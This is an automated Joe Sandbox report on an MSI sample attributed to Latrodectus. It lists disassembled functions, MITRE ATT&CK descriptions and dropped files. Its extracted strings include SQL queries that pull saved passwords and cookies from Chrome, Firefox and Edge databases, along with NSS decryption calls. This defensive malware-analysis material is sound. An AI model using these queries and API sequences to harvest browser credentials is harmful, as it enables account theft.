Opcode ID: 1bff8699f9d97ab45fd99e227eb735527e09be475eebc417901f9c033e89b636
Instruction ID: d73b35fc307dbfbe268ee3e572f9f82fea9ef79a24ef0bfc18610c78b1981afc
Opcode Fuzzy Hash: 1bff8699f9d97ab45fd99e227eb735527e09be475eebc417901f9c033e89b636
Instruction Fuzzy Hash: BF418132721B509AEB509F76E8543DD77A0FB68B99F558027DE0A97B68EF38C045C700

Function 0B8D16F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113filelibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0B8D117C: GetSystemDirectoryW.KERNEL32 ref: 0B8D119F

FindFirstFileW.KERNEL32 ref: 0B8D17F0
FindNextFileW.KERNEL32 ref: 0B8D182F
LoadLibraryW.KERNEL32 ref: 0B8D1840

Strings

\*.dll, xrefs: 0B8D174D

Memory Dump Source

Source File: 00000009.00000002.4136914090.000000000B8D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B8D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b8d0000_explorer.jbxd

Similarity

API ID: FileFind$DirectoryFirstLibraryLoadNextSystem
String ID: \*.dll
API String ID: 834730945-3280006307
Opcode ID: 6866aee8e76eb0f359080723b639546054b0b6eac6c397268d38410719797fd9
Instruction ID: 82a0c89f21b1568834d32a51d8795a928d10a814dcf012fbbf116540ab362b98
Opcode Fuzzy Hash: 6866aee8e76eb0f359080723b639546054b0b6eac6c397268d38410719797fd9
Instruction Fuzzy Hash: 5841FF36704B40C5DB21EF25E8483A97364FB88B94F548216CFAAA3778EF39C586C700

Function 0B8D3698 Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 140
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0B8D343C: SHGetValueA.SHLWAPI ref: 0B8D34C7

LoadLibraryA.KERNEL32 ref: 0B8D37CF
GetProcAddress.KERNEL32 ref: 0B8D3801
GetProcAddress.KERNEL32 ref: 0B8D381C
GetProcAddress.KERNEL32 ref: 0B8D3837
GetProcAddress.KERNEL32 ref: 0B8D3852
GetProcAddress.KERNEL32 ref: 0B8D386D
GetProcAddress.KERNEL32 ref: 0B8D3888
GetProcAddress.KERNEL32 ref: 0B8D38A3

Part of subcall function 0B8D41D0: std::_Xinvalid_argument.LIBCPMT ref: 0B8D4268

Strings

PATH=, xrefs: 0B8D373F
PATH, xrefs: 0B8D36BD, 0B8D36D4
PK11_FreeSlot, xrefs: 0B8D387A
NSS_Init, xrefs: 0B8D37FA
PR_Cleanup, xrefs: 0B8D3844
PL_ArenaFinish, xrefs: 0B8D3829
PK11_GetInternalKeySlot, xrefs: 0B8D385F
PK11SDR_Decrypt, xrefs: 0B8D3895
NSS_Shutdown, xrefs: 0B8D380E
\nss3.dll, xrefs: 0B8D37AE

Memory Dump Source

Source File: 00000009.00000002.4136914090.000000000B8D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B8D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b8d0000_explorer.jbxd

Similarity

API ID: AddressProc$LibraryLoadValueXinvalid_argumentstd::_
String ID: NSS_Init$NSS_Shutdown$PATH$PATH=$PK11SDR_Decrypt$PK11_FreeSlot$PK11_GetInternalKeySlot$PL_ArenaFinish$PR_Cleanup$\nss3.dll
API String ID: 2776111621-1994164264
Opcode ID: e1471d1c379bb25de04987baf5a2d89440bd472ccad988780434ce648a76cb4b
Instruction ID: 5fb68a428c1931c3d24d9b5509d2b5c2949261c3022056b5c56cecbbda30a8ed
Opcode Fuzzy Hash: e1471d1c379bb25de04987baf5a2d89440bd472ccad988780434ce648a76cb4b
Instruction Fuzzy Hash: 66618935311B80D9EB51EF69E8A13A933B1EB61788F85112ACA0D87778DF38C54AC355

Function 0B8D7A88 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0B8D7708: GetTempPathA.KERNEL32 ref: 0B8D7727
Part of subcall function 0B8D7708: lstrcatA.KERNEL32 ref: 0B8D773D
Part of subcall function 0B8D7708: lstrlenA.KERNEL32 ref: 0B8D7746
Part of subcall function 0B8D7708: wsprintfA.USER32 ref: 0B8D788A
Part of subcall function 0B8D7708: lstrcatA.KERNEL32 ref: 0B8D78A0
Part of subcall function 0B8D7708: lstrlenA.KERNEL32 ref: 0B8D78AD

CopyFileA.KERNEL32 ref: 0B8D7AC0
GetLastError.KERNEL32 ref: 0B8D7ACA
GetLastError.KERNEL32 ref: 0B8D7AD5
GetProcessHeap.KERNEL32 ref: 0B8D7B31
HeapAlloc.KERNEL32 ref: 0B8D7B43
GetProcessHeap.KERNEL32 ref: 0B8D7BA2
HeapFree.KERNEL32 ref: 0B8D7BB0
GetProcessHeap.KERNEL32 ref: 0B8D7BB6
HeapFree.KERNEL32 ref: 0B8D7BC4
DeleteFileA.KERNEL32 ref: 0B8D7BDD

Strings

SELECT origin_url,username_value,length(password_value),password_value,date_created,date_last_used FROM logins WHERE username_value <> '', xrefs: 0B8D7B82

Memory Dump Source

Source File: 00000009.00000002.4136914090.000000000B8D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B8D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b8d0000_explorer.jbxd

Similarity

API ID: Heap$Process$ErrorFileFreeLastlstrcatlstrlen$AllocCopyDeletePathTempwsprintf
String ID: SELECT origin_url,username_value,length(password_value),password_value,date_created,date_last_used FROM logins WHERE username_value <> ''
API String ID: 1126038018-4010397166
Opcode ID: 0ff698bb61df7e7270a5b28c3d57b083742cbda33f9715b01bb2336eae2b636a
Instruction ID: f51b1e01287f60ae929808465ed8949513999aff5d874d5584455cdfd7fd9f92
Opcode Fuzzy Hash: 0ff698bb61df7e7270a5b28c3d57b083742cbda33f9715b01bb2336eae2b636a
Instruction Fuzzy Hash: 0341903A324B8596EB60DF22E85479D77A1FB89B94F488126DE4A47B24DF3CC949C700

Function 0B8D5944 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0B8D7708: GetTempPathA.KERNEL32 ref: 0B8D7727
Part of subcall function 0B8D7708: lstrcatA.KERNEL32 ref: 0B8D773D
Part of subcall function 0B8D7708: lstrlenA.KERNEL32 ref: 0B8D7746
Part of subcall function 0B8D7708: wsprintfA.USER32 ref: 0B8D788A
Part of subcall function 0B8D7708: lstrcatA.KERNEL32 ref: 0B8D78A0
Part of subcall function 0B8D7708: lstrlenA.KERNEL32 ref: 0B8D78AD

CopyFileA.KERNEL32 ref: 0B8D597C
GetLastError.KERNEL32 ref: 0B8D5986
GetLastError.KERNEL32 ref: 0B8D5991
GetProcessHeap.KERNEL32 ref: 0B8D59ED
HeapAlloc.KERNEL32 ref: 0B8D59FF
GetProcessHeap.KERNEL32 ref: 0B8D5A5E
HeapFree.KERNEL32 ref: 0B8D5A6C
GetProcessHeap.KERNEL32 ref: 0B8D5A72
HeapFree.KERNEL32 ref: 0B8D5A80
DeleteFileA.KERNEL32 ref: 0B8D5A99

Strings

select name, encrypted_value, length(encrypted_value), host_key, path, creation_utc, expires_utc, is_secure, is_httponly, has_expires from cookies where datetime(expires_utc/1000000 + strftime('%s', '1601-01-01'), 'unixepoch') > datetime('now', 'utc') OR NOT h, xrefs: 0B8D5A3E

Memory Dump Source

Source File: 00000009.00000002.4136914090.000000000B8D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B8D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b8d0000_explorer.jbxd

Similarity

API ID: Heap$Process$ErrorFileFreeLastlstrcatlstrlen$AllocCopyDeletePathTempwsprintf
String ID: select name, encrypted_value, length(encrypted_value), host_key, path, creation_utc, expires_utc, is_secure, is_httponly, has_expires from cookies where datetime(expires_utc/1000000 + strftime('%s', '1601-01-01'), 'unixepoch') > datetime('now', 'utc') OR NOT h
API String ID: 1126038018-1255454737
Opcode ID: 5b8fdea0edd62199f502c3f0406fe8560df84d62b1db6ed72439dadf72f1d3d3
Instruction ID: 6016a4c4dda230520df5a5abc6b9565d72095919b108dd37d979a47d0c7ea4a9
Opcode Fuzzy Hash: 5b8fdea0edd62199f502c3f0406fe8560df84d62b1db6ed72439dadf72f1d3d3
Instruction Fuzzy Hash: 0B41A036224B8596EB60DF22E4547DD77A1FB9AB94F489027DE4A47B24DF38C049CB00

Function 0B969958 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155
timeCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 0B96997B

Part of subcall function 0B968EEC: _invalid_parameter_noinfo.LIBCMT ref: 0B968F00

_get_daylight.LIBCMT ref: 0B96998C

Part of subcall function 0B968E8C: _invalid_parameter_noinfo.LIBCMT ref: 0B968EA0

_get_daylight.LIBCMT ref: 0B96999D

Part of subcall function 0B968EBC: _invalid_parameter_noinfo.LIBCMT ref: 0B968ED0

Part of subcall function 0B964ED0: HeapFree.KERNEL32 ref: 0B964EE6
Part of subcall function 0B964ED0: GetLastError.KERNEL32 ref: 0B964EF8

GetTimeZoneInformation.KERNEL32 ref: 0B9699C4
WideCharToMultiByte.KERNEL32 ref: 0B969A5A
WideCharToMultiByte.KERNEL32 ref: 0B969AA6

Strings

Eastern Standard Time, xrefs: 0B969A2E
?, xrefs: 0B969A99
Eastern Summer Time, xrefs: 0B969A85

Memory Dump Source

Source File: 00000009.00000002.4136914090.000000000B8D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B8D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b8d0000_explorer.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
String ID: ?$Eastern Standard Time$Eastern Summer Time
API String ID: 500310315-688781733
Opcode ID: e7058aed259f57ed55cf1364f6fab453492dfe95792d3d34e5c378728bb1f84b
Instruction ID: a566c2b7d1a6eea42d1cc1c5fa5b69f3f640a1a934f182dc9d98d63816927d6b
Opcode Fuzzy Hash: e7058aed259f57ed55cf1364f6fab453492dfe95792d3d34e5c378728bb1f84b
Instruction Fuzzy Hash: 4F51E632614750CED761DF35E89139A77A8F7887D8F89421AEA4D87B68DB38C541C740

Function 0B8D5ABC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathA.SHELL32 ref: 0B8D5AF7
lstrcatA.KERNEL32 ref: 0B8D5B14
lstrlenA.KERNEL32 ref: 0B8D5B1F
lstrcpyA.KERNEL32 ref: 0B8D5B3F
lstrcpyA.KERNEL32 ref: 0B8D5B52
lstrcatA.KERNEL32 ref: 0B8D5B67
lstrlenA.KERNEL32 ref: 0B8D5B72
lstrcpyA.KERNEL32 ref: 0B8D5B87

Strings

\User Data\Local State, xrefs: 0B8D5B58

Memory Dump Source

Source File: 00000009.00000002.4136914090.000000000B8D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B8D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b8d0000_explorer.jbxd

Similarity

API ID: lstrcpy$lstrcatlstrlen$FolderPath
String ID: \User Data\Local State
API String ID: 2128322890-3114309041
Opcode ID: 7a46133316756fc417819ccfd01d3ea184850a32845edf103635da06fe2200fd
Instruction ID: e5d75626d48f1de00eeac100a62854958aa7bb32a350fa57df658a336b8026d1
Opcode Fuzzy Hash: 7a46133316756fc417819ccfd01d3ea184850a32845edf103635da06fe2200fd
Instruction Fuzzy Hash: 9D314132338A8196DF50CF16E894B997364F795F85F815122EB4E87B28DF38C90AC740

Function 0B8D7C00 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathA.SHELL32 ref: 0B8D7C3B
lstrcatA.KERNEL32 ref: 0B8D7C58
lstrlenA.KERNEL32 ref: 0B8D7C63
lstrcpyA.KERNEL32 ref: 0B8D7C83
lstrcpyA.KERNEL32 ref: 0B8D7C96
lstrcatA.KERNEL32 ref: 0B8D7CAB
lstrlenA.KERNEL32 ref: 0B8D7CB6
lstrcpyA.KERNEL32 ref: 0B8D7CCA

Strings

\User Data\Local State, xrefs: 0B8D7C9C

Memory Dump Source

Source File: 00000009.00000002.4136914090.000000000B8D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B8D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b8d0000_explorer.jbxd

Similarity

API ID: lstrcpy$lstrcatlstrlen$FolderPath
String ID: \User Data\Local State
API String ID: 2128322890-3114309041
Opcode ID: 9d976f5a1b73ff1638e19ac43d7beb5d9674bb69198375f30be1eb409822978e
Instruction ID: 7821803a5597856dd0e2f783c72b959d34f78a0e32ddcd1961ba6f1c79cff71b
Opcode Fuzzy Hash: 9d976f5a1b73ff1638e19ac43d7beb5d9674bb69198375f30be1eb409822978e
Instruction Fuzzy Hash: B6215336335A8196DF50CF15E854B997364F795F85F855022EB4E87728EF38C909C740

Function 0B8D5D94 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32 ref: 0B8D5DB6
SHGetFolderPathA.SHELL32 ref: 0B8D5E03
lstrcatA.KERNEL32 ref: 0B8D5E19

Part of subcall function 0B8D6604: lstrcpyA.KERNEL32 ref: 0B8D6633
Part of subcall function 0B8D6604: lstrlenA.KERNEL32 ref: 0B8D663E
Part of subcall function 0B8D6604: lstrcatA.KERNEL32 ref: 0B8D6662
Part of subcall function 0B8D6604: lstrcatA.KERNEL32 ref: 0B8D6674
Part of subcall function 0B8D6604: FindFirstFileA.KERNEL32 ref: 0B8D6683
Part of subcall function 0B8D6604: lstrcpyA.KERNEL32 ref: 0B8D66D2
Part of subcall function 0B8D6604: lstrcatA.KERNEL32 ref: 0B8D66E8
Part of subcall function 0B8D6604: lstrcatA.KERNEL32 ref: 0B8D66F7
Part of subcall function 0B8D6604: lstrcatA.KERNEL32 ref: 0B8D6709
Part of subcall function 0B8D6604: FindNextFileA.KERNEL32 ref: 0B8D680B
Part of subcall function 0B8D6604: FindClose.KERNEL32 ref: 0B8D681C

Strings

\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe, xrefs: 0B8D5E0D
.txt, xrefs: 0B8D5DDC
.cookie, xrefs: 0B8D5E40

Memory Dump Source

Source File: 00000009.00000002.4136914090.000000000B8D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B8D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b8d0000_explorer.jbxd

Similarity

API ID: lstrcat$Find$FileFolderPathlstrcpy$CloseFirstNextlstrlen
String ID: .cookie$.txt$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe
API String ID: 4173611902-356491070
Opcode ID: 6579cf1bd4637e43c404cdb8aafef78d2a600bfc4f4f8a7df02b4dce260afe02
Instruction ID: 5e58d8f7f6fe97783686473f2ae20c7548890e55c3e66c21f134f30c57c3a86d
Opcode Fuzzy Hash: 6579cf1bd4637e43c404cdb8aafef78d2a600bfc4f4f8a7df02b4dce260afe02
Instruction Fuzzy Hash: BD111F76228B85D6EB50DB10F851BCA7365F7A9304F805137E68E87A68EF3CD248CB00

Function 0B8D5CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0B8D7708: GetTempPathA.KERNEL32 ref: 0B8D7727
Part of subcall function 0B8D7708: lstrcatA.KERNEL32 ref: 0B8D773D
Part of subcall function 0B8D7708: lstrlenA.KERNEL32 ref: 0B8D7746
Part of subcall function 0B8D7708: wsprintfA.USER32 ref: 0B8D788A
Part of subcall function 0B8D7708: lstrcatA.KERNEL32 ref: 0B8D78A0
Part of subcall function 0B8D7708: lstrlenA.KERNEL32 ref: 0B8D78AD

CopyFileA.KERNEL32 ref: 0B8D5D1B
DeleteFileA.KERNEL32 ref: 0B8D5D76

Strings

SELECT host, path, isSecure, expiry, name, value, isHttpOnly FROM moz_cookies, xrefs: 0B8D5D53

Memory Dump Source

Source File: 00000009.00000002.4136914090.000000000B8D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B8D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b8d0000_explorer.jbxd

Similarity

API ID: Filelstrcatlstrlen$CopyDeletePathTempwsprintf
String ID: SELECT host, path, isSecure, expiry, name, value, isHttpOnly FROM moz_cookies
API String ID: 4185374037-3522861938
Opcode ID: 43d74f6a088fc3e418d3fd097b07d923dc96b3aea07d2a847afad3ca13e99e41
Instruction ID: bc24c085ef5bcfe2bd10c43f234085e19179fb276c4af485a59b6f5454104529
Opcode Fuzzy Hash: 43d74f6a088fc3e418d3fd097b07d923dc96b3aea07d2a847afad3ca13e99e41
Instruction Fuzzy Hash: 7E018476724A8592EB51DB65F854BD96330FBE9745F805023DA4A87928DF29C508CB40

Function 0B964F10 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 0B964F4E

Memory Dump Source

Source File: 00000009.00000002.4136914090.000000000B8D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B8D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b8d0000_explorer.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 558171bcc7c76863372ad7002b378d837f4fc13fab5d06e03d61d6356f178b3d
Instruction ID: 8baddd2c866ace9bc0a48b5c5655a51a1af307b76ae392dbedf47d2d65a51f7b
Opcode Fuzzy Hash: 558171bcc7c76863372ad7002b378d837f4fc13fab5d06e03d61d6356f178b3d
Instruction Fuzzy Hash: 36E06D5071920489FE1967F6595137622989FE9BE1F5E4B249D3EC63C1DE2CC0818621

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report zdi.txt.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Latrodectus

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\424595.rbs

C:\Users\user\AppData\Local\Temp\Asxo.tmp

C:\Users\user\AppData\Local\Temp\Ixav.tmp

C:\Users\user\AppData\Local\Temp\Ixav.tmp-shm

C:\Users\user\AppData\Local\Temp\muez.tmp

C:\Users\user\AppData\Local\Temp\ucsafe64.tmp

C:\Users\user\AppData\Local\Temp\vapaef4.tmp

C:\Users\user\AppData\Roaming\wait.dll

C:\Windows\Installer\424593.msi

C:\Windows\Installer\MSI468D.tmp

